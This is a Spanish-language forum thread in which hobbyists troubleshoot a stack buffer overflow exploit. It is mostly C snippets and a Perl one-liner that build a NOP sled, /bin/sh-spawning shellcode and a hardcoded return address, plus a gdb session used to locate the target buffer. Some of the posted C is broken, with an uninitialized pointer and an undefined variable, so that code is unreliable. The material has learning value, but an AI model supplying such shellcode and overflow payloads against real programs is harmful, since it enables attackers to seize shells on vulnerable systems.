No, eso que pusiste no es mi code.
Tiene errores, como
es nops[24]
. Quiza por eso te tira segmentation fault.
Y eso del sprintf que ya te dije
.
Pon mas informacion, que distro usas ???
Yo uso OpenSuSe y me funciona perfecto.
Sa1uDoS
P.D.:Agregame al MSN si quieres y miramos que es con mas detalle
.
EDIT:
A mi asi me funciona:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(){
char nops[24] = "";
char shellcode[]="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
char ret[]="\x18\x1f\x9b\xbf";
char *cmd;
sprintf(cmd
,"%s %s%s%s", exp, nops
, shellcode
, ret
);
return 0;
}
EDIT2:
Prueba si quieres con una shellcode que he hecho yo
, aunque la de Sagrini va genial tambien.
#include <stdio.h> /* Para Sprintf */
#include <string.h> /* Para memset */
#include <stdlib.h> /*Para malloc y system */
int main()
{
char name[]="./bof";
char nops[26]="";
memset(nops
, '\x90', 25); /* Copiamos el byte 90 25 veces en la variable nops */ char shellcode[]="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x31\xc9\x31\xd2\xb0\x0b\xcd\x80";
char ret[]="\x18\x1f\x9b\xbf";
char *cmd;/* Definimos un puntero donde juntaremos todo, para llamarlo con system */
cmd
=(char *)malloc(sizeof(name
)+sizeof(nops
)+sizeof(shellcode
)+sizeof(ret
)+1);/* Reservamos la memoria necesaria para juntar todo */
sprintf(cmd
, "%s %s%s%s", name
,nops
,shellcode
,ret
);/* Juntamos name, nop, shellcode y ret en el puntero cmd, entre name y los demas campos dejamos un espacio */
free(cmd
);/* Liberamos la memoria */ return 0;
}
Wow gracias por revivir a todos! Estaba tanto con el taller que se me habia pasado...
Como os comentaba, podeis probar a hacerlo con Perl desde la linea de comandos
./vuln $(perl -e 'print "\x90"x11 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\xXX\xXX\xXX\xXX"')
Las XX las sustituis por vuestra direccion de regreso
. Aqui pongo la de la variable buffer, donde se encuentra la shellcode. Aparte, si os dais cuenta...
11 + 25 + 4 = 40. Buffer = 36. Que pasa? Porque en medio tenemos EBP y el ret. Pues lo que pasa es que al volver se quitan 4 bytes
.
Bueno, hago eso y me suelta la shell.
Ahora, para vuestra direccion de regreso...
juanra@Juanra:~/Escritorio/Shell$ gcc -o vuln vuln.c --no-stack-protector -z execstack [b]-g[/b]
juanra@Juanra:~/Escritorio/Shell$ gdb -q vuln
(gdb) br vuln
Breakpoint 1 at 0x80483ca: file vuln.c, line 7.
(gdb) r AAA
Starting program: /home/juanra/Escritorio/Shell/vuln AAA
Breakpoint 1, vuln (buff=0xbffffb60 "AAA") at vuln.c:7
7 strcpy (buffer, buff);
(gdb) x/x buffer
[b]0xbffff904[/b]: 0x00000000
(gdb)
Ahora, si quereis le sumais algo por si las moscas
Mostrar Mensajes
no tiene vuelta de hoja. Y si pruebas a mirar el README?
jeje...